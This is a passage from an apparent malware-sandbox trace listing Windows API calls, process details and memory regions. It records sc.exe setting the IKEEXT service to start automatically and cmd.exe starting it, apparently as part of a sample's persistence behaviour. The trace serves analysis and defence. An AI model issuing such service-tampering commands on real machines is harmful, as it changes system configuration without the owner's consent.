lpString2="\\XCOPY.EXE") returned -1 [0048.488] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config ikeext start= auto", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x2af388*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config ikeext start= auto", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af3d4 | out: lpCommandLine="sc config ikeext start= auto", lpProcessInformation=0x2af3d4*(hProcess=0x50, hThread=0x4c, dwProcessId=0xc14, dwThreadId=0xc18)) returned 1 [0048.490] CloseHandle (hObject=0x4c) returned 1 [0048.490] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0048.490] GetEnvironmentStringsW () returned 0x3c00f0* [0048.491] FreeEnvironmentStringsW (penv=0x3c00f0) returned 1 [0048.491] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0048.630] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2af2c8 | out: lpExitCode=0x2af2c8*=0x0) returned 1 [0048.630] CloseHandle (hObject=0x50) returned 1 [0048.630] _vsnwprintf (in: _Buffer=0x2af410, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af2d4 | out: _Buffer="00000000") returned 8 [0048.630] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0048.630] GetEnvironmentStringsW () returned 0x3c2170* [0048.630] FreeEnvironmentStringsW (penv=0x3c2170) returned 1 [0048.630] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0048.630] GetEnvironmentStringsW () returned 0x3c2170* [0048.630] FreeEnvironmentStringsW (penv=0x3c2170) returned 1 [0048.630] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af32c | out: lpAttributeList=0x2af32c) [0048.630] _get_osfhandle (_FileHandle=1) returned 0x7 [0048.630] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0048.630] _get_osfhandle (_FileHandle=1) returned 0x7 [0048.630] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e741ac | out: lpMode=0x49e741ac) returned 1 [0048.630] _get_osfhandle (_FileHandle=0) returned 0x3 [0048.630] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e741b0 | out: lpMode=0x49e741b0) returned 1 [0048.631] SetConsoleInputExeNameW () returned 0x1 [0048.631] GetConsoleOutputCP () returned 0x1b5 [0048.631] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0048.631] SetThreadUILanguage (LangId=0x0) returned 0x409 [0048.631] exit (_Code=0) Process: id = "17" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x7eef7820" os_pid = "0xc14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0xc00" cmd_line = "sc config ikeext start= auto" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1254 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1255 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1256 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1257 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1258 start_va = 0x300000 end_va = 0x30bfff entry_point = 0x300000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1259 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1260 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1261 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1262 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1263 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1264 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1265 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1266 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1267 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1268 start_va = 0x4d0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 1269 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1270 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1271 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1272 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1273 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1274 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1275 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1276 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1277 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1278 start_va = 0xf0000 end_va = 0xfffff entry_point = 0xf0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 53 os_tid = 0xc18 [0048.521] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afe3c | out: lpSystemTimeAsFileTime=0x1afe3c*(dwLowDateTime=0x4e3222c0, dwHighDateTime=0x1d34280)) [0048.521] GetCurrentProcessId () returned 0xc14 [0048.521] GetCurrentThreadId () returned 0xc18 [0048.521] GetTickCount () returned 0x13ed3 [0048.521] QueryPerformanceCounter (in: lpPerformanceCount=0x1afe34 | out: lpPerformanceCount=0x1afe34*=318031749) returned 1 [0048.522] GetModuleHandleA (lpModuleName=0x0) returned 0x300000 [0048.522] __set_app_type (_Type=0x1) [0048.522] __p__fmode () returned 0x768231f4 [0048.522] __p__commode () returned 0x768231fc [0048.522] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3079c7) returned 0x0 [0048.522] __wgetmainargs (in: _Argc=0x309020, _Argv=0x309028, _Env=0x309024, _DoWildCard=0, _StartInfo=0x309034 | out: _Argc=0x309020, _Argv=0x309028, _Env=0x309024) returned 0 [0048.522] SetThreadUILanguage (LangId=0x0) returned 0x409 [0048.524] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0048.524] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0048.524] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0048.524] _wcsicmp (_String1="config", _String2="query") returned -14 [0048.524] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0048.524] _wcsicmp (_String1="config", _String2="start") returned -16 [0048.524] _wcsicmp (_String1="config", _String2="pause") returned -13 [0048.524] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0048.524] _wcsicmp (_String1="config", _String2="control") returned -14 [0048.524] _wcsicmp (_String1="config", _String2="continue") returned -14 [0048.524] _wcsicmp (_String1="config", _String2="stop") returned -16 [0048.524] _wcsicmp (_String1="config", _String2="config") returned 0 [0048.524] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x4defb8 [0048.527] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0048.527] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0048.527] _wcsicmp (_String1="auto", _String2="boot") returned -1 [0048.527] _wcsicmp (_String1="auto", _String2="system") returned -18 [0048.527] _wcsicmp (_String1="auto", _String2="auto") returned 0 [0048.527] OpenServiceW (hSCManager=0x4defb8, lpServiceName="ikeext", dwDesiredAccess=0x3) returned 0x4def18 [0048.527] QueryServiceConfig2W (in: hService=0x4def18, dwInfoLevel=0x3, lpBuffer=0x1afd24, cbBufSize=0x4, pcbBytesNeeded=0x1afd18 | out: lpBuffer=0x1afd24, pcbBytesNeeded=0x1afd18) returned 1 [0048.528] ChangeServiceConfigW (in: hService=0x4def18, dwServiceType=0xffffffff, dwStartType=0x2, dwErrorControl=0xffffffff, lpBinaryPathName=0x0, lpLoadOrderGroup=0x0, lpdwTagId=0x0, lpDependencies=0x0, lpServiceStartName=0x0, lpPassword=0x0, lpDisplayName=0x0 | out: lpdwTagId=0x0) returned 1 [0048.614] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x64, dwLanguageId=0x0, lpBuffer=0x1afcd0, nSize=0x2, Arguments=0x1afcdc | out: lpBuffer="ⲨNﵜ\x1a䋒0ᡜ0༄\x0e\x01") returned 0x22 [0048.625] GetFileType (hFile=0x7) returned 0x2 [0048.625] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1afca4 | out: lpMode=0x1afca4) returned 1 [0048.625] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4e2ca8*, nNumberOfCharsToWrite=0x22, lpNumberOfCharsWritten=0x1afcc0, lpReserved=0x0 | out: lpBuffer=0x4e2ca8*, lpNumberOfCharsWritten=0x1afcc0*=0x22) returned 1 [0048.625] LocalFree (hMem=0x4e2ca8) returned 0x0 [0048.625] LocalFree (hMem=0x0) returned 0x0 [0048.625] CloseServiceHandle (hSCObject=0x4def18) returned 1 [0048.625] CloseServiceHandle (hSCObject=0x4defb8) returned 1 [0048.627] exit (_Code=0) Thread: id = 54 os_tid = 0xc1c Process: id = "18" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7eef7740" os_pid = "0xc20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xb74" cmd_line = "C:\\Windows\\system32\\cmd.exe /c \"net start ikeext\"" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1279 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1280 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1281 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1282 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 1283 start_va = 0x49e50000 end_va = 0x49e9bfff entry_point = 0x49e5829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1284 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1285 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1286 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1287 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1288 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1289 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1290 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1291 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1292 start_va = 0x270000 end_va = 0x2d6fff entry_point = 0x270000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1293 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1294 start_va = 0x721b0000 end_va = 0x721b6fff entry_point = 0x721b1230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1295 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1296 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1297 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1298 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1299 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1300 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1301 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1302 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1303 start_va = 0x3b0000 end_va = 0x477fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1304 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1305 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1306 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 1307 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 1308 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1309 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1310 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1311 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1312 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 1313 start_va = 0x1300000 end_va = 0x15cefff entry_point = 0x1300000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 55 os_tid = 0xc24 [0048.679] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fcbc | out: lpSystemTimeAsFileTime=0x12fcbc*(dwLowDateTime=0x4e49f080, dwHighDateTime=0x1d34280)) [0048.679] GetCurrentProcessId () returned 0xc20 [0048.679] GetCurrentThreadId () returned 0xc24 [0048.679] GetTickCount () returned 0x13f6f [0048.679] QueryPerformanceCounter (in: lpPerformanceCount=0x12fcb4 | out: lpPerformanceCount=0x12fcb4*=318585513) returned 1 [0048.681] GetModuleHandleA (lpModuleName=0x0) returned 0x49e50000 [0048.681] __set_app_type (_Type=0x1) [0048.681] __p__fmode () returned 0x768231f4 [0048.681] __p__commode () returned 0x768231fc [0048.681] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e721a6) returned 0x0 [0048.681] __getmainargs (in: _Argc=0x49e74238, _Argv=0x49e74240, _Env=0x49e7423c, _DoWildCard=0, _StartInfo=0x49e74140 | out: _Argc=0x49e74238, _Argv=0x49e74240, _Env=0x49e7423c) returned 0 [0048.681] GetCurrentThreadId () returned 0xc24 [0048.681] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc24) returned 0x38 [0048.681] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76590000 [0048.681] GetProcAddress (hModule=0x76590000, lpProcName="SetThreadUILanguage") returned 0x765e24c2 [0048.681] SetThreadUILanguage (LangId=0x0) returned 0x409 [0048.682] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0048.682] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fc4c | out: phkResult=0x12fc4c*=0x0) returned 0x2 [0048.682] VirtualQuery (in: lpAddress=0x12fc83, lpBuffer=0x12fc1c, dwLength=0x1c | out: lpBuffer=0x12fc1c*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0048.682] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fc1c, dwLength=0x1c | out: lpBuffer=0x12fc1c*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0048.682] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fc1c, dwLength=0x1c | out: lpBuffer=0x12fc1c*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0048.682] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fc1c, dwLength=0x1c | out: lpBuffer=0x12fc1c*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0048.682] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fc1c, dwLength=0x1c | out: lpBuffer=0x12fc1c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0048.682] GetConsoleOutputCP () returned 0x1b5 [0048.682] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0048.682] SetConsoleCtrlHandler (HandlerRoutine=0x49e6e72a, Add=1) returned 1 [0048.682] _get_osfhandle (_FileHandle=1) returned 0x7 [0048.682] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0048.682] _get_osfhandle (_FileHandle=1) returned 0x7 [0048.682] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e741ac | out: lpMode=0x49e741ac) returned 1 [0048.683] _get_osfhandle (_FileHandle=1) returned 0x7 [0048.683] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0048.683] _get_osfhandle (_FileHandle=0) returned 0x3 [0048.683] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e741b0 | out: lpMode=0x49e741b0) returned 1 [0048.683] _get_osfhandle (_FileHandle=0) returned 0x3 [0048.683] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0048.683] GetEnvironmentStringsW () returned 0x1800c8* [0048.683] FreeEnvironmentStringsW (penv=0x1800c8) returned 1 [0048.683] GetEnvironmentStringsW () returned 0x1800c8* [0048.683] FreeEnvironmentStringsW (penv=0x1800c8) returned 1 [0048.683] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ebbc | out: phkResult=0x12ebbc*=0x40) returned 0x0 [0048.683] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ebc4, lpData=0x12ebc8, lpcbData=0x12ebc0*=0x1000 | out: lpType=0x12ebc4*=0x0, lpData=0x12ebc8*=0xc0, lpcbData=0x12ebc0*=0x1000) returned 0x2 [0048.683] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ebc4, lpData=0x12ebc8, lpcbData=0x12ebc0*=0x1000 | out: lpType=0x12ebc4*=0x4, lpData=0x12ebc8*=0x1, lpcbData=0x12ebc0*=0x4) returned 0x0 [0048.683] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ebc4, lpData=0x12ebc8, lpcbData=0x12ebc0*=0x1000 | out: lpType=0x12ebc4*=0x0, lpData=0x12ebc8*=0x1, lpcbData=0x12ebc0*=0x1000) returned 0x2 [0048.684] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ebc4, lpData=0x12ebc8, lpcbData=0x12ebc0*=0x1000 | out: lpType=0x12ebc4*=0x4, lpData=0x12ebc8*=0x0, lpcbData=0x12ebc0*=0x4) returned 0x0 [0048.684] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ebc4, lpData=0x12ebc8, lpcbData=0x12ebc0*=0x1000 | out: lpType=0x12ebc4*=0x4, lpData=0x12ebc8*=0x40, lpcbData=0x12ebc0*=0x4) returned 0x0 [0048.684] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ebc4, lpData=0x12ebc8, lpcbData=0x12ebc0*=0x1000 | out: lpType=0x12ebc4*=0x4, lpData=0x12ebc8*=0x40, lpcbData=0x12ebc0*=0x4) returned 0x0 [0048.684] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ebc4, lpData=0x12ebc8, lpcbData=0x12ebc0*=0x1000 | out: lpType=0x12ebc4*=0x0, lpData=0x12ebc8*=0x40, lpcbData=0x12ebc0*=0x1000) returned 0x2 [0048.684] RegCloseKey (hKey=0x40) returned 0x0 [0048.684] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ebbc | out: phkResult=0x12ebbc*=0x40) returned 0x0 [0048.684] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ebc4, lpData=0x12ebc8, lpcbData=0x12ebc0*=0x1000 | out: lpType=0x12ebc4*=0x0, lpData=0x12ebc8*=0x40, lpcbData=0x12ebc0*=0x1000) returned 0x2 [0048.684] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ebc4, lpData=0x12ebc8, lpcbData=0x12ebc0*=0x1000 | out: lpType=0x12ebc4*=0x4, lpData=0x12ebc8*=0x1, lpcbData=0x12ebc0*=0x4) returned 0x0 [0048.684] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ebc4, lpData=0x12ebc8, lpcbData=0x12ebc0*=0x1000 | out: lpType=0x12ebc4*=0x0, lpData=0x12ebc8*=0x1, lpcbData=0x12ebc0*=0x1000) returned 0x2 [0048.684] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ebc4, lpData=0x12ebc8, lpcbData=0x12ebc0*=0x1000 | out: lpType=0x12ebc4*=0x4, lpData=0x12ebc8*=0x0, lpcbData=0x12ebc0*=0x4) returned 0x0 [0048.684] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ebc4, lpData=0x12ebc8, lpcbData=0x12ebc0*=0x1000 | out: lpType=0x12ebc4*=0x4, lpData=0x12ebc8*=0x9, lpcbData=0x12ebc0*=0x4) returned 0x0 [0048.684] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ebc4, lpData=0x12ebc8, lpcbData=0x12ebc0*=0x1000 | out: lpType=0x12ebc4*=0x4, lpData=0x12ebc8*=0x9, lpcbData=0x12ebc0*=0x4) returned 0x0 [0048.684] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ebc4, lpData=0x12ebc8, lpcbData=0x12ebc0*=0x1000 | out: lpType=0x12ebc4*=0x0, lpData=0x12ebc8*=0x9, lpcbData=0x12ebc0*=0x1000) returned 0x2 [0048.684] RegCloseKey (hKey=0x40) returned 0x0 [0048.684] time (in: timer=0x0 | out: timer=0x0) returned 0x59ddfa10 [0048.684] srand (_Seed=0x59ddfa10) [0048.684] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"net start ikeext\"" [0048.684] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"net start ikeext\"" [0048.684] GetCurrentDirectoryW (in: 